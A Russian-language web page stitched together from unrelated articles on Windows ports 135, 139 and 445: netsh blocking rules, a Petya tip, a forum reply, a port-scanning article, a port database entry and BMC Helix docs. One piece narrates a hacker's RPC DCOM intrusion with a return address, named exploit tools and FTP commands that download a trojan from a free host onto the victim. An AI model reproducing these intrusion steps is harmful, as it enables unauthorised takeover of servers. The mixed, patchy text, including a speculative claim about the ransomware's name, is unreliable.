Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

TCP порт 139, необходимый для удаленного подключения и управления ПК;
TCP порт 135, предназначенный для выполнения команд;
TCP порт 445, позволяющий быстро передавать файлы;
UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

Одновременно нажать сочетание клавиш Win+R
В появившейся командной строке ввести CMD
Нажать на кнопку «ОК»

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:\Windows\, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).

Шаг 2
Выбираем тип правила — «для Порта ». В следующем окне выбираем пункт «Протокол TCP », указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035 » (без кавычек).

Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

Публикация

Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей… Наверное поэтому
никто не чувствовал страха…

Группа польских экспертов в области
безопасности компьютерных технологий «Last
Stage of Delirium» сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все…

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Пьеса в три акта

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и «RCP Exploit GUI #2».
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by.ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter… После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать «KaHt.exe 129.168.0.1
192.168.0.254″. Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно…

Кровный , то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.

Правила у вас вроде бы прописаны и должны работать.

Вы сканерами портов пробовали проверять? — ЦОБ (Центр Обеспечения Безопасности) (п.2.7)

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.
1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.
2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.
3. Найдите и выберите следующий подраздел реестра:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\
4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.
Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.
1. В меню Правка выберите пункт Создать, а затем — Параметр DWORD (32 бита).
2. Введите DisabledComponents и нажмите клавишу ВВОД.
3. Дважды щелкните пункт DisabledComponents.
5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.
1. Введите 0, чтобы включить все компоненты IP версии 6.
Примечание. Значение «0» используется по умолчанию.
2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.
3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.
4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.
5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.
6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.
Примечания
* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.
* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.
Информация в данной статье относится к следующим продуктам.
* Windows Vista Enterprise
* Windows Vista Enterprise 64-bit edition
* Windows Vista Home Basic 64-bit edition
* Windows Vista Home Premium 64-bit edition
* Windows Vista Ultimate 64-bit edition
* Windows Vista Business
* Windows Vista Business 64-bit edition
* Windows Vista Home Basic
* Windows Vista Home Premium
* Windows Vista Starter
* Windows Vista Ultimate
* Windows 7 Enterprise
* Windows 7 Home Basic
* Windows 7 Home Premium
* Windows 7 Professional
* Windows 7 Ultimate
* Windows Server 2008 R2 Datacenter
* Windows Server 2008 R2 Enterprise
* Windows Server 2008 R2 Standard
* Windows Server 2008 Datacenter
* Windows Server 2008 Enterprise
* Windows Server 2008 Standard

Источник — http://support. microsoft.com/kb/929852

После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.

Сетевые порты могут дать важнейшую информацию о приложениях, которые обращаются к компьютерам по сети. Зная приложения, которые используют сеть, и соответствующие сетевые порты, можно составить точные правила для брандмауэра, и настроить хост-компьютеры таким образом, чтобы они пропускали только полезный трафик. Построив профиль сети и разместив инструменты для распознавания сетевого трафика, можно более эффективно обнаруживать взломщиков — иногда просто анализируя генерируемый ими сетевой трафик. Эту тему мы начали рассматривать в первой части статьи, опубликованной в предыдущем номере журнала. Там приводились основные сведения о портах TCP/IP как фундаменте сетевой безопасности. Во второй части будут описаны некоторые методы для сетей и хост-компьютеров, с помощью которых можно определить приложения, прослушивающие сеть. Далее в статье будет рассказано о том, как оценить трафик, проходящий через сеть.

Блокирование сетевых приложений

Поверхность атаки по сети — общепринятый термин для описания уязвимости сети. Многие сетевые нападения проходят через уязвимые приложения, и можно существенно уменьшить площадь атаки, сократив число активных приложений в сети. Другими словами, следует отключить неиспользуемые службы, установить брандмауэр на выделенной системе для проверки законности трафика и составить исчерпывающий список управления доступом (access control list — ACL) для брандмауэра на периметре сети.

Каждый открытый сетевой порт представляет приложение, прослушивающее сеть. Поверхность атаки каждого сервера, подключенного к сети, можно уменьшить, отключив все необязательные сетевые службы и приложения. Версия Windows Server 2003 превосходит предшествующие версии операционной системы, так как в ней по умолчанию активизируется меньше сетевых служб. Однако аудит все же необходим, чтобы обнаружить вновь установленные приложения и изменения в конфигурации, которые открывают лишние сетевые порты.

Каждый открытый порт — потенциальная лазейка для взломщиков, которые используют пробелы в хост-приложении или тайком обращаются к приложению с именем и паролем другого пользователя (либо применяют другой законный метод аутентификации). В любом случае, важный первый шаг для защиты сети — просто отключить неиспользуемые сетевые приложения.

Сканирование портов

Сканирование портов — процесс обнаружения прослушивающих приложений путем активного опроса сетевых портов компьютера или другого сетевого устройства. Умение читать результаты сканирования и сравнивать сетевые отчеты с результатами хост-опроса портов позволяет составить ясную картину трафика, проходящего через сеть. Знание сетевой топологии — важное условие подготовки стратегического плана сканирования конкретных областей. Например, сканируя диапазон внешних IP-адресов, можно собрать ценные данные о взломщике, проникшем из Internet. Поэтому следует чаще сканировать сеть и закрыть все необязательные сетевые порты.

Внешнее сканирование портов брандмауэра позволяет обнаружить все откликающиеся службы (например, Web или электронная почта), размещенные на внутренних серверах. Эти серверы также следует защитить. Настройте привычный сканер портов (например, Network Mapper — Nmap) на проверку нужной группы портов UDP или TCP. Как правило, сканирование портов TCP — процедура более надежная, чем сканирование UDP, благодаря более глубокой обратной связи с ориентированными на соединения протоколами TCP. Существуют версии Nmap как для Windows, так и для Unix. Запустить базовую процедуру сканирования просто, хотя в программе реализованы и гораздо более сложные функции. Для поиска открытых портов на тестовом компьютере я запустил команду

Nmap 192.168.0.161

На экране 1 показаны результаты сеанса сканирования — в данном случае компьютера Windows 2003 в стандартной конфигурации. Данные, собранные в результате сканирования портов, показывают наличие шести открытых портов TCP.

Экран 1. Базовый сеанс сканирования Nmap

Порт 135 используется функцией отображения конечных точек RPC, реализованной во многих технологиях Windows — например, приложениях COM/DCOM, DFS, журналах событий, механизмах репликации файлов, формирования очередей сообщений и Microsoft Outlook. Данный порт должен быть блокирован в брандмауэре на периметре сети, но трудно закрыть его и одновременно сохранить функциональность Windows.
Порт 139 используется сеансовой службой NetBIOS, которая активизирует браузер поиска других компьютеров, службы совместного использования файлов, Net Logon и службу сервера. Его трудно закрыть, как и порт 135.
Порт 445 используется Windows для совместной работы с файлами. Чтобы закрыть этот порт, следует блокировать File and Printer Sharing for Microsoft Networks. Закрытие этого порта не мешает соединению компьютера с другими удаленными ресурсами; однако другие компьютеры не смогут подключиться к данной системе.
Порты 1025 и 1026 открываются динамически и используются другими системными процессами Windows, в частности различными службами.
Порт 3389 используется Remote Desktop, которая не активизирована по умолчанию, но на моем тестовом компьютере активна. Чтобы закрыть порт, следует перейти к вкладке Remote в диалоговом окне System Properties и сбросить флажок Allow users to connect remotely to this computer.

Обязательно следует выполнить поиск открытых портов UDP и закрыть лишние. Программа сканирования показывает открытые порты компьютера, которые видны из сети. Аналогичные результаты можно получить с помощью инструментов, расположенных на хост-системе.

Хост-сканирование

Помимо использования сетевого сканера портов, открытые порты на хост-системе можно обнаружить с помощью следующей команды (запускается на хост-системе):

Netstat -an

Эта команда работает как в Windows, так и в UNIX. Netstat выдает список активных портов компьютера. В Windows 2003 Windows XP следует добавить параметр -o, чтобы получить соответствующий идентификатор процесса (program identifier — PID). На экране 2 показаны выходные результаты Netstat для того же компьютера, сканирование портов которого выполнялось ранее. Следует обратить внимание на то, что закрыто несколько портов, которые прежде были активны.

Аудит журнала брандмауэра

Еще один полезный способ обнаружения сетевых приложений, которые отправляют или получают данные по сети, — собирать и анализировать больше данных в журнале брандмауэра. Записи Deny, в которых приводится информация с внешнего интерфейса брандмауэра, вряд ли будут полезны из-за «шумового трафика» (например, от червей, сканеров, тестирования по ping), засоряющего Internet. Но если записывать в журнал разрешенные пакеты с внутреннего интерфейса, то можно увидеть весь входящий и исходящий сетевой трафик.

Чтобы увидеть «сырые» данные трафика в сети, можно установить сетевой анализатор, который подключается к сети и записывает все обнаруженные сетевые пакеты. Самый широко распространенный бесплатный сетевой анализатор — Tcpdump для UNIX (версия для Windows называется Windump), который легко устанавливается на компьютере. После установки программы следует настроить ее для работы в режиме приема всех сетевых пакетов, чтобы регистрировать весь трафик, а затем подключить к монитору порта на сетевом коммутаторе и отслеживать весь трафик, проходящий через сеть. О настройке монитора порта будет рассказано ниже. Tcpdump — чрезвычайно гибкая программа, с помощью которой можно просматривать сетевой трафик с использованием специализированных фильтров и показывать только информацию об IP-адресах и портах либо все пакеты. Трудно просмотреть сетевые дампы в больших сетях без помощи соответствующих фильтров, но следует соблюдать осторожность, чтобы не потерять важные данные.

Объединение компонентов

До сих пор мы рассматривали различные методы и инструменты, с помощью которых можно обнаружить приложения, использующие сеть. Пришло время объединить их и показать, как определить открытые сетевые порты. Поразительно, как «болтливы» компьютеры в сети! Во-первых, рекомендуется познакомиться с документом Microsoft «Service overview and network port requirements for the Windows Server system» (http://support. microsoft.com/default.aspx?scid=kb;en-us;832017 ), в котором перечислены протоколы (TCP и UDP) и номера портов, используемые приложениями и большинством основных служб Windows Server. В документе описаны эти службы и используемые ими ассоциированные сетевые порты. Рекомендуется загрузить и распечатать это полезное для администраторов сетей Windows справочное руководство.

Настройка сетевого анализатора

Ранее отмечалось, что один из способов определить порты, используемые приложениями, — отслеживать трафик между компьютерами с помощью сетевого анализатора. Чтобы увидеть весь трафик, необходимо подключить сетевой анализатор к концентратору или монитору портов в коммутаторе. Каждому порту концентратора виден весь трафик каждого компьютера, подключенного к этому концентратору, но концентраторы — устаревшая технология, и большинство компаний заменяют их коммутаторами, которые обеспечивают хорошую производительность, но неудобны для анализа: каждый порт коммутатора принимает только трафик, направляемый одному компьютеру, подключенному к данному порту. Чтобы анализировать всю сеть, нужно отслеживать трафик, направляемый в каждый порт коммутатора.

Для этого требуется настроить монитор порта (разные поставщики называют его span port или mirrored port) в коммутаторе. Установить монитор порта в коммутаторе Cisco Catalyst компании Cisco Systems не составляет труда. Нужно зарегистрироваться на коммутаторе и активизировать режим Enable, затем перейти в режим configure terminal и ввести номер интерфейса порта коммутатора, на который следует посылать весь контролируемый трафик. Наконец, необходимо указать все отслеживаемые порты. Например, следующие команды обеспечивают мониторинг трех портов Fast Ethernet и пересылку копии трафика в порт 24.

Interface FastEthernet0/24 port monitor FastEthernet0/1 port monitor FastEthernet0/2 port monitor FastEthernet0/3 end

В данном примере сетевой анализатор, подключенный к порту 24, будет просматривать весь исходящий и входящий трафик компьютеров, подключенных к первым трем портам коммутатора. Для просмотра созданной конфигурации следует ввести команду

Write memory

Первоначальный анализ

Рассмотрим пример анализа данных, проходящих через сеть. Если для сетевого анализа используется компьютер Linux, то можно получить исчерпывающее представление о типе и частоте пакетов в сети с помощью такой программы, как IPTraf в режиме Statistical. Детали трафика можно выяснить с использованием программы Tcpdump.

Порт 135 (tcp/udp) — онлайн-поиск портов TCP UDP

Номер порта или имя:

Введите номер порта (например, 21), сервис (например, ssh, ftp) или угроза (например, nimda)

База данных обновлена - 30 марта 2016 г.

Результаты поиска для «135»

Порт: 135/TCP

Сервис
Детали
Источник
Разрешение конечной точки DCE (официальное)
ВИКИ
epmap
Разрешение конечной точки DCE
IANA
Microsoft EPMAP (End Point Mapper), также известная как служба локатора DCE/RPC, используется для удаленного управления службами, включая DHCP-сервер, DNS-сервер и WINS. Также используется DCOM (неофициальный)
WIKI
loc-srv
Брокер локального местоположения NCS
SANS
угроза
[угроза] Secefa
Bekkoame
угроза
[угроза] W32.Kiman
Беккоаме
угроза
[угроза] Femot
Bekkoame
угроза
[угроза] W32.Blaster.Worm
Bekkoame
угроза
[угроза] W32.Francette.Worm
Bekkoame
угроза
[угроза] W32.Explet
Bekkoame
угроза
[угроза] W32.Kibuv.Worm
Беккоаме
угроза
[угроза] W32.Lovgate
Беккоаме
угроза
[угроза] W32.Маслан
Беккоаме
угроза
[угроза] W32.Mytob
Bekkoame
угроза
[угроза] W32.Reatle
Bekkoame
угроза
[угроза] W32. Spybot
Bekkoame
угроза
[угроза] W32.Welchia
Bekkoame
угроза
[угроза] W32.Yaha
Беккоаме
угроза
[угроза] W32.Cissi
Беккоаме
угроза
[угроза] W32.HLLW.Gaobot
Беккоаме
угроза
[угроза] W32.HLLW.Polybot
Bekkoame
угроза
[угроза] W32.Kassbot
Беккоаме

Порт: 135/UDP

Служба
Детали
Источник
epmap
Разрешение конечной точки DCE
IANA
Microsoft EPMAP (End Point Mapper), также известная как служба локатора DCE/RPC, используется для удаленного управления службами, включая DHCP-сервер, DNS-сервер и WINS. Также используется DCOM (неофициальный)
WIKI
Разрешение конечной точки DCE (официальное)
ВИКИ
loc-srv
Служба определения местоположения
SANS
угроза
[угроза] W32. Blaster.Worm
Bekkoame
угроза
[угроза] W32.Cissi
Беккоаме
угроза
[угроза] W32.Explet
Bekkoame
угроза
[угроза] W32.Francette.Worm
Bekkoame
угроза
[угроза] W32.HLLW.Gaobot
Беккоаме
угроза
[угроза] W32.HLLW.Polybot
Bekkoame
угроза
[угроза] W32.Kassbot
Беккоаме
угроза
[угроза] W32.Kibuv.Worm
Bekkoame
угроза
[угроза] W32.Lovgate
Беккоаме
угроза
[угроза] W32.Maslan
Беккоаме
угроза
[угроза] W32.Mytob
Bekkoame
угроза
[угроза] W32.Reatle
Bekkoame
угроза
[угроза] W32.Spybot
Bekkoame
угроза
[угроза] W32. Welchia
Bekkoame
угроза
[угроза] W32.Yaha
Беккоаме
угроза
[угроза] Femot
Bekkoame

О портах TCP/UDP

Порт TCP 135 использует протокол управления передачей. TCP является одним из основных протоколов в сетях TCP/IP. TCP — это протокол, ориентированный на установление соединения, он требует установления связи для установления сквозной связи. Только когда соединение установлено, пользовательские данные могут быть отправлены в двух направлениях по соединению.
Внимание! TCP гарантирует доставку пакетов данных на порт 135 в том же порядке, в котором они были отправлены. Гарантированная связь через порт TCP 135 является основным отличием между TCP и UDP. UDP-порт 135 не гарантирует связь как TCP.
UDP на порту 135 обеспечивает ненадежную службу, и дейтаграммы могут приходить дублированными, не по порядку или отсутствовать без уведомления. UDP на порту 135 считает, что проверка и исправление ошибок не нужны или не выполняются в приложении, что позволяет избежать накладных расходов на такую обработку на уровне сетевого интерфейса.
UDP (протокол пользовательских дейтаграмм) — это минимальный протокол транспортного уровня, ориентированный на сообщения (протокол задокументирован в IETF RFC 768).
Примеры приложений, в которых часто используется UDP: передача голоса по IP (VoIP), потоковое мультимедиа и многопользовательские игры в реальном времени. Многие веб-приложения используют UDP, например. система доменных имен (DNS), протокол информации о маршрутизации (RIP), протокол динамической конфигурации хоста (DHCP), простой протокол управления сетью (SNMP).
TCP vs UDP — TCP: надежный, упорядоченный, тяжеловесный, потоковый; UDP — ненадежные, неупорядоченные, легковесные дейтаграммы.

Ваш IP-адрес

161.97.168.212

Сетевые порты, используемые для связи при обнаружении — документация для BMC Helix Discovery

В этом разделе описывается связь между BMC Helix Discovery Outpost и целями обнаружения.

Обнаружение базового устройства

Для повышения эффективности BMC Helix Discovery Outpost использует ICMP ping для обнаружения устройства. Можно использовать другие методы проверки связи, если эхо-сигнал ICMP подавлен в вашей среде. Для этого на Администрирование , прокрутите вниз до раздела Обнаружение и нажмите Конфигурация обнаружения . В разделе «Сканирование» установите флажки Использовать TCP ACK «ping» перед сканированием и Использовать TCP SYN «ping» перед сканированием и введите номера портов в TCP-порты, которые будут использоваться для первоначального сканирования, и UDP-порты для использовать для полей начального сканирования.

Если вы не разрешаете эхо-запросы ICMP через брандмауэр и не включаете эхо-запросы TCP Ack и Syn, производительность может снизиться. Это связано с тем, что система выполняет полное сканирование портов nmap «Метод доступа», чтобы определить, действительно ли хост присутствует, что вызывает задержки, поскольку он ожидает запросов на истечение времени ожидания. В этой ситуации вы должны изменить настройку «Ping hosts before scan» на «No». Если существует ограниченный диапазон IP-адресов, для которых эхо-запрос ICMP подавляется, вы можете отключить проверку связи для этих IP-адресов с помощью параметра Исключить диапазоны из проверки связи. Дополнительные сведения см. в разделе Настройка параметров обнаружения.

Если BMC Helix Discovery не может подключиться к конечной точке, он использует эвристические методы для оценки того, какое устройство присутствует. Они контролируются параметрами в Настройках параметров обнаружения.

Порт 4 с использованием TCP и UDP требуется, если при использовании отпечатков пальцев IP, поскольку обнаружение должно отслеживать ответ от гарантированно закрытого порта на конечной точке.

Порт 4 должен быть закрыт на цели обнаружения, но должен быть открыт на любом брандмауэре между устройством (или экземпляром) и целью обнаружения, чтобы ответ исходил от цели, а не от брандмауэра. Если это не так, эвристика получает ответ от двух разных стеков TCP/IP, что приводит к непредсказуемым результатам, включая классификацию конечной точки как брандмауэр или неопознанное устройство. Это может привести к пропуску устройств (см. UnsupportedDevice на странице DiscoveryAccess).

Порты, перечисленные в следующей таблице, используются для определения того, какое устройство присутствует.

9044

3940

Port Number	Port assignment
4	Closed Port
21	FTP
22	SSH
23	telnet
80	HTTP
135	Windows RPC
161	SNMP
443	HTTPS
513	rlogin
902	Демон проверки подлинности VMware 9 4449	Discovery for z/OS Agent
5988	WBEM HTTP
5989	WBEM HTTPS

SNMP Ports used for discovery

The only port required for SNMP discovery 161 УДП.

Порты UNIX, используемые для обнаружения

Минимальный порт, необходимый для успешного обнаружения UNIX, — это порт, связанный с используемыми вами методами доступа. Например, если вы используете только ssh, это будет порт 22. В следующей таблице подробно описано назначение для каждого номера порта.

Port Number	Port assignment
22	SSH
23	telnet
513	rlogin

Порты Windows, используемые для обнаружения

В этом разделе описаны порты, которые BMC Discovery Outpost использует при обнаружении удаленных целей Windows. Если вы собираетесь обнаруживать хосты за брандмауэром, вы должны открыть эти порты в брандмауэре. Указанные порты являются исходящими (от прокси-сервера Windows и экземпляра) TCP-портами. Цели Windows и порт 135. Outpost сканирует порт 135, чтобы определить, открыт ли порт. Если порт 135 открыт, целью, скорее всего, является хост Windows, и дальнейшее обнаружение выполняется соответствующим образом. Вы можете отключить сканирование порта 135. В этом случае BMC Helix Discovery предполагает, что все цели являются хостами Windows. Чтобы отключить сканирование порта 135, выполните следующие действия:

Выберите Администрирование > Обнаружение > Конфигурация обнаружения .
Выберите Нет в поле Проверить порт 135 перед использованием методов доступа Windows .

PowerShell

Вся связь PowerShell с устройства (или экземпляра) BMC Helix Discovery, BMC Discovery Outpost или прокси-сервера Windows AD отправляется по HTTP или HTTPS с использованием обычных портов PowerShell, а не стандартных веб-портов (443/80). .

Порты, используемые для обнаружения PowerShell, и соответствующие назначения описаны в следующей таблице.

Port Number	Port assignment
5985	PowerShell HTTP
5986	PowerShell HTTPS

WMI

